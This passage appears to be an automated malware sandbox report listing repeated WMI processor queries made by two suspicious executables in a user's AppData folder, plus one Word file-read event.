                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
